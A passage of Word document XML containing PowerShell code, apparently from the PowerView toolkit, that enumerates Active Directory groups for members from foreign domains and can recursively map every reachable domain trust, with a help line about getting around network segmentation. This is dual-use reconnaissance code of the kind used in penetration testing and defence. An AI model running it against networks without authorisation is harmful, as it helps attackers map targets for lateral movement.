    <w:p w14:paraId="4830BBF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Enumerating trust groups in domain $DomainTrust"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A7EDEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Get-ForeignUser -Domain $DomainTrust -UserName $UserName -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155EF52A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F006D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7143B4AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D776F2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-ForeignUser -Domain $Domain -DomainController $DomainController -UserName $UserName -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F0BD7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A1F100" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A75442" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2C5837DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F6371CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Find-ForeignGroup {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35118384" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF21B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED3D41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B539D15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Enumerates all the members of a given domain's groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BE30DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        and finds users that are not in the queried domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78650FB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The -Recurse flag will perform this enumeration for all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58187DE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        eachable domain trusts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA2EE18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B94ED22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B59DFBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71E8F37B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Groupname to filter results for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D19AEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5430C5C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1FEA55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="596DC1ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain to query for groups, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B59576" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6B33AD13" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3883B09B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2F1B0A25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60ED22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1075F3F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D1091" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E11493E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68339CB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        More likely to get around network segmentation, but not as accurate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0F5C51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B55485F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Recurse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C64027" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D97D144" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Enumerate all group trust users from all reachable domains recursively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3443E0EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B185F3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610A1553" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5AE10883" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061070FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3FCB8D3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF5B273" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32CBD173" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://blog.harmj0y.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F035D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A0F7C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="584E63D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5258DAB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB6D62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58300657" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupName = '*',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45702B38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B36E798" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045FB3C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668068A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="673BB192" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7818253F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5159E1B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0034FED4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C20BA39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LDAP,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E94E0D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10819E6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A713A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $Recurse,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA1B5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7BE8272E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14340799" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B144409" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4382E3BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6794AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13BF10C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    function Get-ForeignGroup {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F38606" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506964F4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7652B722" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $GroupName = '*',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E489307" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="213D612A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC55822" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD2DBF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="274D040C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A1031F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C019008" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72FF5F97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A031825" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C219AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $PageSize = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78602B08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5FD7CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="23E6C418" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(-not $Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FD806B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Domain = (Get-NetDomain).Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26346F73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A45BCE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7062BD2F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainDN = "DC=$($Domain.Replace('.', ',DC='))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17009BA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "DomainDN: $DomainDN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5F242B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15FB2D56" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # standard group names to ignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6006FA0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExcludeGroups = @("Users", "Domain Users", "Guests")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B3E5AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E7EB141" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # get all the groupnames for the given domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D62E62E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetGroup -GroupName $GroupName -Filter '(member=*)' -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize | Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762524D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # exclude common large groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A031371" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            -not ($ExcludeGroups -contains $_.samaccountname) } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330D8688" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EED6E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GroupName = $_.samAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB6A73E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="133ADB21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $_.member | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F54027" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # filter for foreign SIDs in the cn field for users in another domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AAF6BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    #   or if the DN doesn't end with the proper DN for the queried domain  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C8203F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if (($_ -match 'CN=S-1-5-21.*-.*') -or ($DomainDN -ne ($_.substring($_.IndexOf("DC="))))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8A198F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5003597E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $UserDomain = $_.subString($_.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D08BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $UserName = $_.split(",")[0].split("=")[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C955649" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="681C129F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignGroupUser = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18035161" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignGroupUser | Add-Member Noteproperty 'GroupDomain' $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5255B421" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignGroupUser | Add-Member Noteproperty 'GroupName' $GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEC312D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignGroupUser | Add-Member Noteproperty 'UserDomain' $UserDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C27675C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignGroupUser | Add-Member Noteproperty 'UserName' $UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB5105C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignGroupUser | Add-Member Noteproperty 'UserDN' $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23416E65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignGroupUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2034CB6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246CA097" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765976BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612CAE69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2BE144" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="506DAF7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($Recurse) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF23AAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # get all rechable domains in the trust mesh and uniquify them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C2111B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($LDAP -or $DomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0517283B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DomainTrusts = Invoke-MapDomainTrust -LDAP -DomainController $DomainController -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646F16BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C7DFB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DE833D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DomainTrusts = Invoke-MapDomainTrust -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5D9C7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4965BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59D0E6F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ForEach($DomainTrust in $DomainTrusts) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3878E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # get the trust groups for each domain in the trust mesh</w:t>
      </w:r>
    </w:p>
